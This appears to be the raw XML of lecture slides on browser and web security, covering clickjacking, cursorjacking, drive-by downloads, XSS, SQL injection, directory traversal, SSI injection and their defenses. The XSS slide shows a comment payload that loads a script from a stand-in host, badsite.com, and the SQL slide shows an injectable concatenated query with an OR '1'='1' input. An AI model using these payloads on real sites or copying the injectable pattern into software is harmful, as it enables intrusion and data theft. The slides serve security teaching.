            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hacker can only send a single click</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2018238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Scenarios</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tricking users into enabling their webcam and microphone through Flash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Downloading and running a malware (malicious software) allowing to a remote attacker to take control of others computers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Clicking Google AdSense ads to generate pay-per-click revenue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1299640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Cursorjacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cursor may be changed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create a more visible fake shifted cursor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In addition to the real cursor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Will cause the victim to go to evil website, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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3581400"/>
            <a:ext cx="1449147" cy="2531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5" descr="Image result for cursorj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14800"/>
            <a:ext cx="27241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8600" y="6113145"/>
            <a:ext cx="7183248" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>http://resources.infosecinstitute.com/bypassing-same-origin-policy-part-3-clickjacking-cursorjacking-filejacking/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>https://explosivelab.blogspot.com/2012/04/cursor-jacking.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="224563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 Known Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Twitter clickjacking worm:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attack convinced users to click on a button that re-tweeted location of a malicious page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Propagated massively	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Facebook attacks:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trickers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> users into “liking” items</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fan pages, links, groups, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1781202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 Defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requiring user confirmation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reduces usability, requires extra actions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adding random UI elements, randomize location of buttons on page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make it harder for attacker to overlay known elements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Difficult to implement, may still be vulnerable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker may click multiple locations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8776717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 Defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implementing defensive code in the UI </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensure current frame is most top level window</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Preventing websites from framing your site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Incorporating frame-breaking methods when programming site </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="366665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67A2-4C9E-1547-B16B-DEB274C81A4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security Issues for Browsers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F83A6141-F5A8-D642-B34C-354AB188269A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A browser often connects to more than the one address shown in the browser’s address bar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fetching data can entail accesses to numerous locations </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to obtain pictures, audio content, and other linked content.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser software can be malicious or can be corrupted to acquire malicious functionality.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{779BBE98-6F6B-7F47-9C62-7992956BA4E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="346589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 Defenses - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sitekeys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A mutual authentication web-based technique</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>between end-users and websites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To deter phishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Owned by RSA </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Was used by Vanguard, Bank of America</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discontinued in 2015</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Still used by some sights </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Found to be ineffective</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>People don’t notice or care about it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35018649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C4B5C-7952-4B6D-9CB7-4DA55EE3E47F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Clickjacking Defenses - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sitekeys</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E7C043E-DE93-4CEE-94DA-296B1E1B59B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451D860-5EA1-43EC-9D7C-E0D480507F86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="1717675"/>
            <a:ext cx="5655802" cy="4233863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28503659-A01E-4BBD-B8AA-741E203D6C9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="6477000"/>
            <a:ext cx="5331011" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>https://www.cs.tufts.edu/comp/117/slides/MezTufts2018.pdf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1540052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Drive-By Download</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code is downloaded, installed, and executed on a computer without the user’s knowledge</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May be the result of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>clickjacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, fake code, program download </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>subsitution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, etc.</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52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="fig04-14.t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496" y="4189432"/>
            <a:ext cx="8507506" cy="1279033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>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9390688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Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tricking a client or server into executing scripted code by including the code in data inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scripts and HTML tags are encoded as plaintext just like user inputs, so they can take over web pages similarly to the way buffer overflow attacks can take over programs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Cool&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;story.&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>KCTVBigFan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>badsite.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>xss.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;&lt;/script&gt;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53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Aria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3898817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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8378456" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Injecting SQL code into an exchange between an application and its database server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Loading an SQL query into a variable, taking the value of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>acctNum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from an arbitrary user input field:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>QUERY = "SELECT * FROM trans WHERE acct = '" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>acctNum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> + " '; "</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>The same query with malicious user input:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>QUERY = "SELECT * FROM trans WHERE acct = '2468' OR '1'='1'; "</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:cs typeface="Courier New"/>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54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Aria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1694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Dot-Dot-Slash</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also known as “directory traversal,” this is when attackers use the term “../” to access files that are on the target web server but not meant to be accessed from outside</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most commonly entered into the URL bar but may also be combined with other attacks, such as XSS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55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2015-09-06 at 4.26.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497225"/>
            <a:ext cx="8326718" cy="547351"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>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2592239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Include (SSI)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SSI is an interpreted server-side scripting language that can be used for basic web server directives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>such as including files and executing commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As is the case with XSS, some websites are vulnerable to allowing users to execute SSI directives through text input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56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2015-09-06 at 4.27.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805" y="5041900"/>
            <a:ext cx="4686300" cy="431800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>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0023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Countermeasures to Injections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
